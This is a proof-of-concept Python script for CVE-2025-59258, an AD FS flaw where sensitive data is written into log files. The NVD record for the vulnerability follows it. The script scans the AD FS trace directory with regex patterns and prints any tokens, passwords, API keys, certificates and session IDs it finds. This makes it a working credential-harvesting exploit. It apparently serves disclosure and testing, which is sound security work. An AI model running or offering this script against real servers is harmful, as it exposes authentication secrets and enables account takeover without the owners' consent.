CVE-2025-59258

# CVE-2025-59258 PoC - AD FS Sensitive Information Disclosure via Log Files # This PoC demonstrates how to search for sensitive information in AD FS log files import os import re import sys def search_adfs_logs(log_directory="C:\\ProgramData\\Microsoft\\ADFS\\Trace"): """ Search for sensitive information in AD FS log files. This demonstrates the information disclosure vulnerability where sensitive data is written to log files accessible to local users. """ # Patterns that may indicate sensitive information in AD FS logs sensitive_patterns = [ (r'(?i)(token|jwt|saml)\s*[:=]\s*([A-Za-z0-9_\-\.]{20,})', 'Authentication Token'), (r'(?i)(password|passwd|pwd)\s*[:=]\s*(\S+)', 'Password'), (r'(?i)(secret|api[_-]?key)\s*[:=]\s*(\S+)', 'Secret/API Key'), (r'(?i)(certificate|cert)\s*[:=]\s*([A-Za-z0-9+/=]{20,})', 'Certificate Data'), (r'(?i)(session[_-]?id|sid)\s*[:=]\s*([A-Za-z0-9\-]{10,})', 'Session ID'), (r'(?i)(bearer)\s+([A-Za-z0-9_\-\.]{20,})', 'Bearer Token'), ] findings = [] # Check AD FS trace log directory if os.path.exists(log_directory): print(f"[*] Scanning AD FS log directory: {log_directory}") for root, dirs, files in os.walk(log_directory): for file_name in files: if file_name.endswith(('.log', '.txt', '.etl')): file_path = os.path.join(root, file_name) try: with open(file_path, 'r', errors='ignore') as f: content = f.read() for pattern, info_type in sensitive_patterns: matches = re.findall(pattern, content) if matches: for match in matches[:5]: # Limit output findings.append({ 'file': file_path, 'type': info_type, 'data': match[1] if len(match) > 1 else match[0] }) except PermissionError: print(f"[!] Permission denied: {file_path}") except Exception as e: print(f"[!] Error reading {file_path}: {e}") else: print(f"[-] AD FS log directory not found: {log_directory}") # Also check Windows Event Logs for AD FS events print("\n[*] Check Windows Event Viewer for AD FS/AD FS Tracing logs") print(" Event sources: AD FS, AD FS Tracing, ADFS-Proxy") return findings if __name__ == "__main__": print("=" * 60) print("CVE-2025-59258 - AD FS Log Information Disclosure PoC") print("=" * 60) log_dir = sys.argv[1] if len(sys.argv) > 1 else "C:\\ProgramData\\Microsoft\\ADFS\\Trace" results = search_adfs_logs(log_dir) if results: print(f"\n[!] Found {len(results)} potential sensitive information entries:") for r in results: print(f" File: {r['file']}") print(f" Type: {r['type']}") print(f" Data: {r['data'][:50]}...") print() else: print("\n[-] No sensitive information found in accessible log files.")

{"cve": {"id": "CVE-2025-59258", "sourceIdentifier": "[email protected]", "published": "2025-10-14T17:16:08.463", "lastModified": "2025-10-20T19:49:17.140", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insertion of sensitive information into log file in Active Directory Federation Services allows an unauthorized attacker to disclose information locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-532"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "matchCriteriaId": "A7DF96F8-BA6A-4780-9CA3-F719B3F81074"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "matchCriteriaId": "DB18C4CE-5917-401E-ACF7-2747084FD36E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "versionEndIncluding": "10.0.14393.8519", "matchCriteriaId": "860ADFF9-62D0-425B-9310-99ACFC92EB12"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.17763.7919", "matchCriteriaId": "20810926-AEC9-4C09-9C52-B4B8FADECF3A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.20348.4294", "matchCriteriaId": "B1C1EA69-6BB8-4E59-8659-43581FDB48B7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.25398.1913", "matchCriteriaId": "370C12D6-90EF-44BE-8070-AA0080C12600"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2025:*:*:*:*:*:*:*:*", "versionEndIncluding": "10.0.26100.6899", "matchCriteriaId": "CD6268EB-C42B-406F-B3FF-6E694F93BF41"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59258", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}